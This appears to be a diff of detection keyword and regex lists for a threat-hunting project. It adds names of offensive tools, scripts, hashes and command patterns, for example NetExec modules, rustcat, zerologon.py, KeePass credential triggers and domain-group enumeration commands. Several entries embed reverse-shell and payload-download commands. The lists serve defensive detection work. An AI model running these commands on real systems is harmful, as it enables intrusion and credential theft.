*\WinRing0x64.sys* +*\winscp_dump.py* *\WiperPoc.cpp* +*\wireless.py* *\wl_log.txt* *\wl-lic.exe* *\wl-lic.pdb* @@ -6810,6 +6952,7 @@ *\XOR_b64_encrypted\* *\xorencrypt.py* *\ysoserial\* +*\zerologon.py* *] Eventviewer Persistence created* *] Extension Hijacking Persistence created* *] Found non-ASCII service: * @@ -7322,6 +7465,7 @@ *Add-Exfiltration.ps1* *Add-KeePassConfigTrigger* *AddKeePassTrigger.ps1* +*AddKeePassTrigger.ps1* *Add-MpPreference -ExclusionPath * *Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe* *Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All* @@ -7605,6 +7749,7 @@ *arp.spoof on* *arp.spoof.* *arp.spoof.targets* +*arp_mitm.py* *arp_spoof.* *arpspoof -i * *ArpSpoofer* @@ -7825,6 +7970,7 @@ *B374K*index.php* *b3rito*yodo* *b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94* +*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB* *b4ldr/nse-scripts* *b4rtik/RedPeanut* *b4rtik/RedPeanut* @@ -8169,6 +8315,7 @@ *bkeylogger* *bkkgdjpomdnfemhhkalfkogckjdkcjkg* *bks2john.py* +*blackarch/tree/master/packages/rustcat* *blackarrowsec/mssqlproxy* *blackarrowsec/pivotnacci* *blackhat-arsenal-tools* @@ -8768,6 +8915,7 @@ *ChaitanyaHaritash/kimi* *chameleon.py * *changepasswd.py* +*change-windows10-mac-address.py* *charlesnathansmith/whatlicense* *charles-proxy* *charlotte-main.zip* @@ -10193,6 +10341,7 @@ *EasyHook-Managed/LocalHook.cs* *EasyPersistent.cna* *Ebowla-master.zip* +*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052* *echo * .bash_history* *echo * /home/*/.bash_history* *echo * /root/.bash_history* @@ -10495,6 +10644,8 @@ *exec /bin/sh 0&0 2>&0* *exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done* *exec CMD=/bin/sh -f elf -o *.elf* +*Exec_Command_Silent.vbs* +*Exec_Command_WithOutput.vbs* *exec_payload_msi* *exec_shellcode.rb* *ExecCmdImplant* @@ -11874,7 +12025,9 @@ *hook-lsassy.py* *hook-lsassy.py* *hook-lsassy.py* +*hook-lsassy.py* *hook-pypsrp.py* +*hook-pypykatz.py* *HOST/EXEGOL-01.* *Host: FUZZ.machine.org* *HostEnum.ps1* @@ -12775,7 +12928,9 @@ *Invoke-noPac.* *Invoke-NTLMAuth.ps1* *Invoke-Ntsd.ps1* +*Invoke-Obfuscation -ScriptPath * *Invoke-Obfuscation* +*Invoke-Obfuscation.psd1* *Invoke-OpenInboxFinder* *Invoke-OpenOWAMailboxInBrowser* *Invoke-OxidResolver* @@ -12867,6 +13022,7 @@ *Invoke-PSImage* *Invoke-PSInject* *Invoke-PSInject.ps1* +*Invoke-PSInject.ps1* *Invoke-PsUACme* *Invoke-PsUACme* *Invoke-PsUACme* @@ -13692,6 +13848,7 @@ *lan_sw_port_scan.json* *lanjelot* *LANs.py* +*lanscan_arp.py* *lansearch.exe * *lansearchpro_portable.zip* *lansearchpro_setup.exe* @@ -14146,6 +14303,7 @@ *manager/mRemoteNG.py* *mandiant/DueDLLigence* *mandiant/gocrack* +*mandiant/msi-search* *mandllinject * *manspider * -d * -u * -p * *manspider */24 -f * @@ -14549,9 +14707,11 @@ *Mshikaki-main* *mshta/shellcode_inject* *MSHTAStager* +*msi-search-main.zip* *msLDAPDump.py* *MSOfficeManipulator.cs* *msol_dump* +*msol_dump.ps1* *MSOLSpray * *MSOLSpray.git* *MSOLSpray.ps1* @@ -14742,9 +14902,19 @@ *nessus-updates*.tar.gz* *net domain_controllers* *net group "Domain Admins" /domain* +*net group *Account Operators* /domain* +*net group *Backup Operators* /domain* *net group *domain admins* /domain* +*net group *Domain Computers* /domain* +*net group *Domain Controllers* /domain* *net group *Domain Controllers*/domain* *net group *Enterprise Admins* /dom* +*net group *Enterprise Admins* /domain* +*net group *Exchange Trusted Subsystem* /domain* +*net group *Microsoft Exchange Servers* /domain* +*net group *Print Operators* /domain* +*net group *Schema Admins* /domain* +*net group *Server Operators* /domain* *net group / domain *Domain Admins* *net group /domain *Domain Admins* *net group administrators /domain* @@ -14759,6 +14929,16 @@ *net user john H4x00r123* *net view /all /domain* *net* group Administrator* /add /domain* +*net.exe* group *Account Operators* /domain* +*net.exe* group *Backup Operators* /domain* +*net.exe* group *Domain Computers* /domain* +*net.exe* group *Domain Controllers* /domain* +*net.exe* group *Enterprise Admins* /domain* +*net.exe* group *Exchange Trusted Subsystem* /domain* +*net.exe* group *Microsoft Exchange Servers* /domain* +*net.exe* group *Print Operators* /domain* +*net.exe* group *Schema Admins* /domain* +*net.exe* group *Server Operators* /domain* *net.fuzz * *net.fuzz.* *net.probe on @@ -14781,7 +14961,27 @@ *net_localgroup_member -Group* *net_portscan.py* *net_recon.* +*net1 group *Account Operators* /domain* +*net1 group *Backup Operators* /domain* +*net1 group *Domain Computers* /domain* +*net1 group *Domain Controllers* /domain* +*net1 group *Enterprise Admins* /domain* +*net1 group *Exchange Trusted Subsystem* /domain* +*net1 group *Microsoft Exchange Servers* /domain* +*net1 group *Print Operators* /domain* +*net1 group *Schema Admins* /domain* +*net1 group *Server Operators* /domain* *net1 localgroup admin* +*net1.exe* group *Account Operators* /domain* +*net1.exe* group *Backup Operators* /domain* +*net1.exe* group *Domain Computers* /domain* +*net1.exe* group *Domain Controllers* /domain* +*net1.exe* group *Enterprise Admins* /domain* +*net1.exe* group *Exchange Trusted Subsystem* /domain* +*net1.exe* group *Microsoft Exchange Servers* /domain* +*net1.exe* group *Print Operators* /domain* +*net1.exe* group *Schema Admins* /domain* +*net1.exe* group *Server Operators* /domain* *netCat* *net-creds* *netdiscover -i * -r */24* @@ -14793,6 +14993,7 @@ *NetExec ldap * -M enum_trusts* *NetExec winrm *--* *NetExec-main.zip* +*NetExec-main.zip* *Net-GPPPassword.cs* *Net-GPPPassword.exe* *Net-GPPPassword_dotNET* @@ -14923,6 +15124,8 @@ *nmap -Pn -v -sS -F* *nmap-*-setup.exe* *nmap/ncrack* +*nmap_port_scanner.py* +*nmap_port_scanner_ip_obj.py* *nmap_smb_scan_custom_*.txt* *nmapAnswerMachine.py* *nmap-elasticsearch-nse* @@ -15082,6 +15285,8 @@ *nxc mssql *--local-auth* *nxc ssh * *nxc winrm * -X * +*nxc*nxcdb.py* +*nxcdb-zipapp-* *nysm.skel.h* *nysm-master.zip* *nyxgeek* @@ -15324,6 +15529,7 @@ *package=impacket* *PackMyPayload.py* *PackMyPayload-master* +*pacman -S rustcat* *pacu --exec * *pacu --list-modules* *pacu --module-args=* @@ -15702,6 +15908,8 @@ *pornhub.py* *port and pasv both active* *port_forward_pivot.py* +*port_scanner_ip_obj.py* +*port_scanner_regex.py* *PortBender backdoor* *PortBender redirect* *PortBender.cna* @@ -16257,6 +16465,7 @@ *pwn_jenkins* *pwn1sher/CS-BOFs* *pwn1sher/WMEye* +*pwn3d_label = Pwn3d!* *pwnagotchi* *pwnat.exe* *pwncat-cs *:* @@ -16305,6 +16514,7 @@ *pyherion.py* *pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh* *pyinstaller *.py* +*pyinstaller netexec.spec* *pyinstaller.exe* *pyinstaller/tarball* *pyinstaller-script.py* @@ -16563,6 +16773,15 @@ *RBCD_Petitpotam_VulnerableServers.txt* *rbsec/dnscan* *rc4.py *.bin* +*rcan listen -ib * +*rcat c -s bash * +*rcat connect -s bash* +*rcat listen 55660* +*rcat listen -ie * +*rcat listen -l * +*rcat-v3.*darwin-aarch64* +*rcat-v3.*-darwin-x86_64* +*rcat-v3.*-linux-x86_64* *RCE-exploits* *rclone copy *:* *rclone.exe config create remote mega user * @@ -16820,6 +17039,7 @@ *Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt* *Remove-KeePassConfigTrigger* *RemoveKeePassTrigger.ps1* +*RemoveKeePassTrigger.ps1* *remove-persistence* *Remove-Persistence.ps1* *remove-persistence-cron* @@ -16854,6 +17074,7 @@ *responder-smb-on* *Responder-Windows* *RestartKeePass.ps1* +*RestartKeePass.ps1* *restic2john.py* *restore_signature.sh *.dmp* *RestrictedAdmin.exe* @@ -17119,6 +17340,7 @@ *RuralBishop.sln* *RuralBishop-master* *rustbof.cna* +*rustcat-3.0.0.zip* *rusthound * --zip --ldaps --adcs --old-bloodhound* *rusthound *--domain* *rusthound *--ldapfqdn * @@ -17297,6 +17519,7 @@ *scshellbof.o* *scshellbofx64* *scumjr*dirtycow-vdso* +*Search cached MSI files in C:/Windows/Installer/* *search_for_secrets(* *Search-cpassword* *SearchOutlook.exe* @@ -18674,6 +18897,7 @@ *targetver.h* *tarunkant/Gopherus* *tas389.ps1* +*taskkill /F /T /IM keepass.exe /FI* *tasklist /fi *Imagename eq lsass.exe* | find *lsass* *tasklist /svc | findstr /i "vmtoolsd.exe"* *TaskShell.exe * -b *.exe* @@ -19207,6 +19431,8 @@ *vectra-ai-research/MAAD-AF* *veeam_credential_dump.* *veeam_dump* +*veeam_dump_mssql.ps1* +*veeam_dump_postgresql.ps1* *Vegile -* *venv wapiti3* *Verified Merlin server * @@ -19402,6 +19628,8 @@ *WhoamiGetTokenInfo* *wifi/airpwn* *wifi/dnspwn* +*wifi_dos_own.py* +*wifi_dos3.py* *wifi_dump_linux* *wifi_fake_auth.* *WiFi_Hacker.ino* @@ -19797,6 +20025,7 @@ *Yay! No SYSMON here!* *YDHCUI/csload.net* *YDHCUI/manjusaka* +*yeelight_discover.py* *Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC* *ylAo2kAlUS2kYkala!* *Yml0c3kubWl0LmVkdQ==* @@ -19999,6 +20228,7 @@ pupysh python3 start_campaign.py raw_keylogger * rawshark -* +rcat listen * RedGuard -* remotereg * rev2self* diff --git a/only_keywords_regex.txt b/only_keywords_regex.txt index 0ffc6a8f3..2b6bbe1ad 100644 --- a/only_keywords_regex.txt +++ b/only_keywords_regex.txt @@ -2604,6 +2604,7 @@ .*/\.manspider/loot.* .*/\.msf4/.* .*/\.ntdissector.* +.*/\.nxc/obfuscated_scripts/.* .*/\.sliver/logs.* .*/\.ssh/RAI\.pub.* .*//:ptth.* @@ -2646,6 +2647,7 @@ .*/ADACLScanner\.git.* .*/adalanche/modules/.* .*/adconnectdump\.git.* +.*/adcs\.py.* .*/adcs_enum/.* .*/adcs_request/adcs_request\..* .*/adcs_request/CertCli\..* @@ -2654,6 +2656,7 @@ .*/adcs-enum\.py.* .*/ADCSKiller.* .*/ADCSPwn\.git.* +.*/add_computer\.py.* .*/add_groupmember\.py.* .*/address-info\.nse.* .*/AddUser-Bof\..* @@ -2885,13 +2888,16 @@ .*/BesoToken\.exe.* .*/BesoToken\.git.* .*/bettercap.* +.*/bh_owned\.py.* .*/bhqc\.py -.* .*/BIFFRecordEncryption\.cs.* .*/bin/0d1n.* .*/bin/AceLdr.* +.*/bin/bash -c 'bash -i >& /dev/tcp/.*/.* 0>&1'.* .*/bin/fake-sms.* .*/bin/gorsair .* .*/bin/hakrawler.* +.*/bin/nxcdb.* .*/bin/posh.* .*/bin/pupysh.* .*/bin/read_i\.php\?a1=step2-down-b&a2=.* @@ -3307,6 +3313,7 @@ .*/D1rkInject\.git.* .*/d4em0n/exrop.* .*/daap-get-library\.nse.* +.*/daclread\.py.* .*/DAMP\.git.* .*/DanMcInerney/ridenum.* .*/daphne\.git.* @@ -3322,6 +3329,7 @@ .*/data/auxiliary/gather.* .*/data/empire\.db.* .*/data/exploits/.* +.*/data/nxc\.conf.* .*/data/shellcode.* .*/DavRelayUp\.git.* .*/DavRelayUp/.* @@ -3375,6 +3383,7 @@ .*/detect-hooks\.h.* .*/Detect-Hooks/.* .*/DFSCoerce\.git.* +.*/dfscoerce\.py.* .*/dhcp-discover\.nse.* .*/Dialogs/Payload\.hpp.* .*/dicom-brute\.nse.* @@ -3480,6 +3489,7 @@ .*/drda-brute\.nse.* .*/drda-info\.nse.* .*/Drones/SleepDialogue\.razor.* +.*/drop-sc\.py.* .*/drunkpotato.* .*/dsniff\.c.* .*/dsniff\.services.* @@ -3535,6 +3545,7 @@ .*/Empire\.git .*/empire/client/.* .*/empire:latest.* +.*/empire_exec\.py.* .*/EmpireProject.* .*/enable-user\.py.* .*/enableuser/enableuser\.x64\..* @@ -3545,7 +3556,9 @@ .*/enum__secrets/.*\.py.* .*/enum_av\.md.* .*/enum_av\.py.* +.*/enum_av\.py.* .*/enum_cisco\.md.* +.*/enum_dns\.py.* .*/enum_domain_info.* .*/enum_f5\.md.* .*/enum_juniper\.md.* @@ -3653,6 +3666,7 @@ .*/FilelessPELoader.* .*/final_shellcode_size\.txt.* .*/find_domain\.sh.* +.*/find-computer\.py.* .*/FindModule\.c.* .*/FindObjects\.cna.* .*/FindSQLSrv\.py.* @@ -3720,6 +3734,7 @@ .*/Gemail-Hack\.git.* .*/GetBrowsers\.ps1.* .*/get-clipboard\.py.* +.*/get-desc-users\.py.* .*/getLegit/cdnl.* .*/getLegit/grkg.* .*/getLegit/prvw.* @@ -3864,6 +3879,8 @@ .*/goZulipC2\.git.* .*/GPOddity\.git.* .*/GPOddity/.* +.*/gpp_autologin\.py.* +.*/gpp_password\.py.* .*/gpp-decrypt.* .*/gpsd-info\.nse.* .*/GreatSCT/.* @@ -3895,9 +3912,11 @@ .*/Hak5\.sh.* .*/hakrawler\.git.* .*/hancitor\.profile.* +.*/handlekatz\.py.* .*/HandleKatz_BOF.* .*/HarmJ0y.* .*/HaryyUser\.exe.* +.*/hash_spider\.py.* .*/hashcat.* .*/hashdump_dc.* .*/Hashi0x/.* @@ -4122,6 +4141,7 @@ .*/imfiver/CVE-2022-0847.* .*/impacket\..* .*/impacket/.* +.*/impersonate\.py.* .*/impersonate-rs.* .*/imperun .* .*cmd\.exe /c whoami.* .*/Imperva_gzip_WAF_Bypass.* @@ -4173,6 +4193,7 @@ .*/instabrute\.py.* .*/instainsane\.git.* .*/instainsane\.sh.* +.*/install_elevated\.py.* .*/install-sb\.sh.* .*/insTof\.py.* .*/interactive_shell\.py.* @@ -4189,6 +4210,7 @@ .*/Invoke-HostEnum\.ps1.* .*/Invoke-RunAs\.ps1.* .*/Invoke-SMBRemoting\.git.* +.*/IOXIDResolver\.py.* .*/ip_spoof\.rb.* .*/IPayloadService\..* .*/ip-forwarding\.nse.* @@ -4261,7 +4283,9 @@ .*/kdstab\..* .*/KDStab\..* .*/KDStab/.* +.*/keepass_discover\.py.* .*/keepass_discover_.*\.txt.* +.*/keepass_trigger\.py.* .*/KeeThief\.git.* .*/kerberoast\..* .*/kerberoast\.c.* @@ -4325,6 +4349,7 @@ .*/lansearch\.exe.* .*/laps\.py .*--ldapserver.* .*/laps\.py .*-u .* -p .* +.*/laps\.py.* .*/laps_dump_.*\.txt.* .*/LAPSDumper\.git.* .*/lastpass\.py.* @@ -4337,6 +4362,7 @@ .*/ldap_injection\.txt.* .*/ldap_search_bof\.py.* .*/ldap-brute\.nse.* +.*/ldap-checker\.py.* .*/ldap-novell-getpass\.nse.* .*/LdapRelayScan\.git.* .*/ldap-rootdse\.nse.* @@ -4398,6 +4424,7 @@ .*/LSASSProtectionBypass/CredGuard\.c.* .*/LsassSilentProcessExit\.git.* .*/lsassy.* +.*/lsassy_dump\.py.* .*/lucksec/CVE-2022-0847.* .*/lu-enum\.nse.* .*/luijait/arpspoofing.* @@ -4436,6 +4463,7 @@ .*/manspider_.*\.log.* .*/manspider_output.*\.txt .*/manspiderDump.* +.*/masky\.py.* .*/master/GPSCoordinates/.* .*/master/JunctionFolder/.* .*/master/PhantomService/.* @@ -4455,6 +4483,7 @@ .*/merlin\.js.* .*/merlin\.py.* .*/merlin/agent_code/.* +.*/met_inject\.py.* .*/Metasploit.* .*/metasploit/.* .*/metasploit-framework/embedded/framework.* @@ -4525,6 +4554,7 @@ .*/Mr-Un1k0d3r/.* .*/Mr-xn/cve-2022-23131.* .*/MS15-034\.nse.* +.*/ms17-010\.py.* .*/msf\.go .*/msf\.swf.* .*/msfcrawler.* @@ -4536,9 +4566,13 @@ .*/Mshikaki\.git.* .*/mshta\.cmd.* .*/mshtajs\.cmd.* +.*/msi_search\.ps1.* +.*/msi-search\.git.* .*/msLDAPDump.* +.*/msol\.py.* .*/MSOLSpray.* .*/msrpc-enum\.nse.* +.*/mssql_priv\.py.* .*/ms-sql-brute\.nse.* .*/ms-sql-config\.nse.* .*/ms-sql-dac\.nse.* @@ -4581,6 +4615,7 @@ .*/n1nj4sec/pupy.* .*/nanodump.* .*/nanodump\..* +.*/nanodump\.py.* .*/nanorobeus\.git.* .*/nanorubeus/.* .*/Native/SigFlip/.* @@ -4612,6 +4647,7 @@ .*/netbus-version\.nse.* .*/netcreds\.py.* .*/NetExec\.git.* +.*/netexec\.py.* .*/NetExec-main.* .*/Net-GPPPassword\.git.* .*/nethunter-images/.* @@ -4680,6 +4716,7 @@ .*/NoFilter\.sln.* .*/NoFilter\.vcxproj.* .*/nopac\.exe +.*/nopac\.py.* .*/No-PowerShell\.cs.* .*/No-PowerShell\.exe.* .*/nopowershell\.git.* @@ -4702,6 +4739,7 @@ .*/NTDLLReflection\.git.* .*/NtdllUnpatcher\.git.* .*/ntds_dump_.*\.txt.* +.*/ntdsutil\.py.* .*/ntlm\.py.* .*/ntlmquic.* .*/NTLMRecon.* @@ -4716,6 +4754,7 @@ .*/ntlmutil\.py.* .*/ntlmutil\.py.* .*/ntlmv1\.py.* +.*/ntlmv1\.py.* .*/ntp-info\.nse.* .*/ntp-monlist\.nse.* .*/NtQuerySystemInformation\.md.* @@ -4726,6 +4765,10 @@ .*/Nuages_Cli.* .*/nuagesAPI\.js.* .*/nxc --help.* +.*/nxc\.exe.* +.*/nxc/parsers/ip\.py.* +.*/nxc/parsers/nmap\.py.* +.*/nxc-ubuntu-latest.* .*/nysm bash.* .*/nysm -dr socat TCP4-LISTEN.* .*/nysm -r ssh .*@.* @@ -4818,6 +4861,7 @@ .*/parrot-on-docker/.* .*/parrotsec/.* .*/ParsedMalleableData\.txt.* +.*/parsers/nessus\.py.* .*/pass_gen\.pl.* .*/PassDetective\.git.* .*/passhash\.sl.* @@ -4868,6 +4912,7 @@ .*/persistence2\.rc.* .*/peterspbr/dirty-pipe-otw.* .*/PetitPotam\.git.* +.*/petitpotam\.py.* .*/PEzor\.cna.* .*/PEzor\.git.* .*/PEzor\.sh .* @@ -4960,6 +5005,7 @@ .*/printerbug\.py.* .*/PrintMonitorDll\..* .*/PrintMonitorDll/.* +.*/printnightmare\.py.* .*/PrintSpoofer\.git.* .*/PrintSpoofer\.git.* .*/PrintSpoofer/.* @@ -4974,6 +5020,7 @@ .*/PrivKit\.git.* .*/PrivKit/.* .*/proberbyte\.go.* +.*/procdump\.py.* .*/process_herpaderping/.* .*/process_killer\.cpp.* .*/processhacker-.*-bin\.zip.* @@ -5103,9 +5150,12 @@ .*/rawrpc\.py.* .*/RC4BinaryEncryption\.cs.* .*/RC4Payload32\.txt.* +.*/rcat-v.*-win-x86_64\.exe.* .*/RCStep/CSSG/.* +.*/rdcman\.py.* .*/RDE1\.git.* .*/rdll_template.* +.*/rdp\.py.* .*/RDPassSpray\.git.* .*/RDPCredentialStealer\.git.* .*/rdp-enum-encryption\.nse.* @@ -5150,6 +5200,7 @@ .*/reGeorg\.git.* .*/RegistryPersistence\.c.* .*/Registry-Recon/.* +.*/reg-query\.py.* .*/regreeper\.jpg.* .*/Reg-Restore-Persistence-Mole.* .*/regsvcs/meterpreter.* @@ -5241,6 +5292,7 @@ .*/RunasCs\.git.* .*/RunasCs\.git.* .*/RunasCs\.zip.* +.*/runasppl\.py.* .*/RunAsWinTcb\.git.* .*/RunAsWinTcb\.iml.* .*/runcalc\.dll.* @@ -5250,6 +5302,7 @@ .*/runshellcode\..* .*/RuralBishop\.git.* .*/rusers\.nse.* +.*/rustcat/releases/latest/download/.* .*/rusthound\.exe.* .*/RustHound\.git.* .*/rvrsh3ll/.* @@ -5278,6 +5331,7 @@ .*/scanner/portscan.* .*/scanner/winrm.* .*/scannerPort\.go.* +.*/scan-network\.py.* .*/Scans/servers_all_smb.*\.txt.* .*/ScareCrow -I .* .*/sccmhunter.* @@ -5295,6 +5349,7 @@ .*/ScRunHex\.py.* .*/scshell.* .*/scshell\.py.* +.*/scuffy\.py.* .*/searchsploit.* .*/Seatbelt\.txt.* .*/Seatbelt/Commands.* @@ -5333,6 +5388,7 @@ .*/sh_executor/.*\.go.* .*/s-h-3-l-l/.* .*/shadowcoerce\.py.* +.*/shadowcoerce\.py.* .*/ShadowForgeC2.* .*/ShadowSpray\.git.* .*/ShadowSpray/.*\.cs.* @@ -5461,6 +5517,7 @@ .*/sleep_python_bridge/.* .*/Sleeper/Sleeper\.cna.* .*/sleepmask\.cna.* +.*/slinky\.py.* .*/SlinkyCat\.git.* .*/sliver\.git.* .*/sliver\.pb\.go.* @@ -5574,6 +5631,7 @@ .*/spellgen\.py .* .*/spellstager\.py .* .*/spider\.yaml.* +.*/spider_plus\.py.* .*/SpiderFoot-.*\.log\.cs.* .*/SpiderFoot\.csv.* .*/spiderfoot\.git.* @@ -5584,6 +5642,7 @@ .*/spoof/mdns.* .*/spoof/spoof_windows\..* .*/SpookFlare\.git.* +.*/spooler\.py.* .*/spoolsystem/SpoolTrigger/.* .*/spray/spray\.py.* .*/Spray365.* @@ -5622,6 +5681,7 @@ .*/src/nysm\.c.* .*/src/RecycledGate\.h.* .*/src/Sleeper\.cpp.* +.*/src/unixshell\.rs.* .*/srdi-shellcode\.go.* .*/ssh2-enum-algos\.nse.* .*/ssh-auth-methods\.nse.* @@ -5722,6 +5782,7 @@ .*/tcpshell\.py.* .*/Teamphisher\.txt.* .*/Teamphisher/targets\.txt.* +.*/teams_localdb\.py.* .*/teamserver-linux\.tar\.gz.* .*/teamserver-win\.zip.* .*/teamspeak2-version\.nse.* @@ -5836,6 +5897,7 @@ .*/tso-enum\.nse.* .*/tweetshell\.sh.* .*/twittor\.git.* +.*/uac\.py.* .*/UACBypasses/.* .*/UACME\.git.* .*/UAC-SilentClean/.* @@ -5884,6 +5946,7 @@ .*/vajra/phishApp\.py.* .*/var/lib/ptunnel.* .*/var/log/exegol/.*\.log.* +.*/veeam_dump\.py.* .*/Vegile\.git.* .*/venom\.git.* .*/venom\.sh .* @@ -5937,14 +6000,17 @@ .*/WDExtract\.git.* .*/wdextract32\.exe.* .*/wdextract64\.exe.* +.*/wdigest\.py.* .*/WdToggle\.c.* .*/WdToggle\.h.* .*/weakpass\.git.* .*/Web/decouverte\.txt.* .*/Web/discovery\.txt.* .*/web/pwn\.html.* +.*/web_delivery\.py.* .*/web_rce\.py.* .*/WebC2\.cs.* +.*/webdav\.py.* .*/WebDavC2\.git.* .*/web-hacking-toolkit.* .*/weblistener\.py.* @@ -5963,6 +6029,7 @@ .*/WfpTokenDup\.exe.* .*/whatlicense\.git.* .*/WheresMyImplant/.* +.*/whoami\.py.* .*/WhoAmI\.task.* .*/whois-domain\.nse.* .*/whois-ip\.nse.* @@ -5998,7 +6065,9 @@ .*/winrm\.py.* .*/winrmdll.* .*/winrm-reflective-dll/.* +.*/winscp_dump\.py.* .*/Winsocky\.git.* +.*/wireless\.py.* .*/wiresocks\.git.* .*/wmeye/.* .*/WMI Lateral Movement/.* @@ -6053,6 +6122,7 @@ .*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb\.bin.* .*/zerologon\.cna.* .*/zerologon\.py.* +.*/zerologon\.py.* .*/zhzyker/CVE-2020-5902.* .*/zsh_executor/.*\.go.* .*/zwjjustdoit/cve-2022-23131.* @@ -6070,6 +6140,7 @@ .*\?PSAmsi.*PSReflect\.ps1.* .*\?sample_sliver\.json.* .*\[!] Failed to enumerate Credman:.* +.*\[!] Dumping the ntds can crash the DC on Windows Server 2019\. Use the option.* .*\[!] Failed to download legitimate GPO from SYSVOL \(dc_ip:.* .*\[!] Failed to write malicious scheduled task to downloaded GPO\. Exiting.* .*\[\#] Ready For ETW Patch\..* @@ -6165,7 +6236,9 @@ .*\\9\.dll .*\\9\.exe .*\\AbandonedCOMKeys\..* +.*\\adcs\.py.* .*\\ADCSPwn.* +.*\\add_computer\.py.* .*\\ADFSpoof\.py.* .*\\ADFSpray.* .*\\ADGet\.exe.* @@ -6211,6 +6284,7 @@ .*\\BesoToken\.cpp.* .*\\BesoToken\.exe.* .*\\BesoToken\.vcxproj.* +.*\\bh_owned\.py.* .*\\bin\\cme\.exe.* .*\\bin\\shepard\\.* .*\\BITB-main.* @@ -6268,6 +6342,7 @@ .*\\CurrentVersion\\Uninstall\\FreeFileSync_is1.* .*\\CustomEncoding\.cpp.* .*\\D1rkInject\\.* +.*\\daclread\.py.* .*\\darkexe\.py.* .*\\DarkLoadLibrary\..* .*\\dcrypt\.exe.* @@ -6286,6 +6361,7 @@ .*\\Dendron\.bin.* .*\\Dendron\.exe.* .*\\Dendron\.sln.* +.*\\dfscoerce\.py.* .*\\DInjector\.sln.* .*\\DInjector\\.* .*\\dist\\sigthief\.exe.* @@ -6301,6 +6377,7 @@ .*\\donut\.exe.* .*\\donut\\VanillaProgram\.bin.* .*\\Doraemon.* +.*\\drop-sc\.py.* .*\\duedlligence\.dll.* .*\\dumper\.ps1.* .*\\dumpert\..* @@ -6319,8 +6396,11 @@ .*\\Elite\.csproj.* .*\\Elite\.sln.* .*\\emailall\.py.* +.*\\empire_exec\.py.* .*\\enc_shellcode\.bin.* .*\\enc_shellcode\.h.* +.*\\enum_av\.py.* +.*\\enum_dns\.py.* .*\\ES\.Alan\.Core.* .*\\EternalHushCore\.dll.* .*\\EternalHushCore\\.* @@ -6346,6 +6426,7 @@ .*\\Fertliser\.exe.* .*\\Fertliser\.pdb.* .*\\Files\\ContainersFileUrls\.txt.* +.*\\find-computer\.py.* .*\\follina\.py.* .*\\FreeFileSync\.exe.* .*\\FreeFileSync\\Logs\\.* @@ -6354,7 +6435,9 @@ .*\\freeze\.go .*\\FtpC2\\.* .*\\FudgeC2.* +.*\\get_netconnections\.py.* .*\\GetBrowsers\.ps1.* +.*\\get-desc-users\.py.* .*\\Get-SpoolStatus\.ps1.* .*\\GetWebDAVStatus\\ .*\\GetWebDAVStatus_x64.* @@ -6371,15 +6454,21 @@ .*\\go-secdump.* .*\\goZulipC2.* .*\\GPOddity\\.* +.*\\gpp_autologin\.py.* +.*\\gpp_password\.py.* +.*\\group_members\.py.* .*\\Group3r\.exe.* .*\\Grouper2\.exe.* +.*\\groupmembership\.py.* .*\\GzipB64\.exe.* .*\\HackBrowserData.* .*\\Hades\.exe.* .*\\hades\.exe.* .*\\hades-main\.zip.* .*\\handlekatz\.exe.* +.*\\handlekatz\.py.* .*\\harvest\.cmb.* +.*\\hash_spider\.py.* .*\\hashview\.py.* .*\\HiddenDesktop\\.* .*\\hijackers\\.* @@ -6401,6 +6490,7 @@ .*\\IDiagnosticProfileUAC.* .*\\iis_controller\.py.* .*\\impacket\..* +.*\\impersonate\.py.* .*\\Implant\.exe .* .*\\implant\.exe .*\.exe .*\\ImplantSSP\.exe.* @@ -6408,9 +6498,11 @@ .*\\inceptor\.py.* .*\\injector\.ps1 1 .* .*\\injector\.ps1 2 .* +.*\\install_elevated\.py.* .*\\Inveigh\.exe.* .*\\inveigh\.exe.* .*\\Inveigh\\bin\\.* +.*\\IOXIDResolver\.py.* .*\\IPfuscation\.cpp.* .*\\IPfuscation\.exe.* .*\\ipscan-.*-setup\.exe.* @@ -6423,6 +6515,8 @@ .*\\JunctionFolder\.csproj.* .*\\katz\.ps1.* .*\\kdstab\.exe.* +.*\\keepass_discover\.py.* +.*\\keepass_trigger\.py.* .*\\KeeTheft\.exe.* .*\\kerberoast\.c.* .*\\KernelTokens\.sys.* @@ -6440,8 +6534,10 @@ .*\\Ladon\.exe.* .*\\Ladon\.ps1.* .*\\lansearch\.exe.* +.*\\laps\.py.* .*\\LAPSDumper\\.* .*\\ldap_search_bof\.py.* +.*\\ldap-checker\.py.* .*\\LibSnaffle.* .*\\Loader\\Loader\.csproj.* .*\\local_admins\.csv.* @@ -6452,18 +6548,22 @@ .*\\lsass\.dmp.* .*\\LSASSProtectionBypass\\.* .*\\LsassSilentProcessExit.* +.*\\lsassy_dump\.py.* .*\\m3-gen\.py.* .*\\MaccaroniC2.* +.*\\MachineAccountQuota\.py.* .*\\macoffe\.pdb.* .*\\malseclogon\..* .*\\MalStuff\.cpp.* .*\\malware_runner\.py.* .*\\manspider_.*\.log.* +.*\\masky\.py.* .*\\master\\GPSCoordinates\\.* .*\\Mayhem\.psm1.* .*\\megatools-.*-win64\\.* .*\\megatools\.exe.* .*\\mem_dll\.pdb.* +.*\\met_inject\.py.* .*\\mhydeath64.* .*\\mimi32\.exe.* .*\\mimi64\.exe.* @@ -6472,17 +6572,29 @@ .*\\monkey\.exe .* .*\\monkey32\.exe.* .*\\monkey64\.exe.* +.*\\ms17-010\.py.* .*\\Mshikaki\.cpp.* +.*\\msi_search\.c.* +.*\\msi_search\.exe.* +.*\\msi_search\.ps1.* +.*\\msi_search\.x64\.o.* +.*\\msi_search\.x86\.o.* +.*\\msol\.py.* .*\\MSOL\\DomainCompanyInfo\.txt.* +.*\\mssql_priv\.py.* .*\\mystikal\.py.* .*\\nanodump.* +.*\\nanodump\.py.* .*\\net.*\\ftpagent\.exe.* .*\\net\.exe.* accounts.* .*\\net\.exe.* localgroup admin.* .*\\net\.exe.* 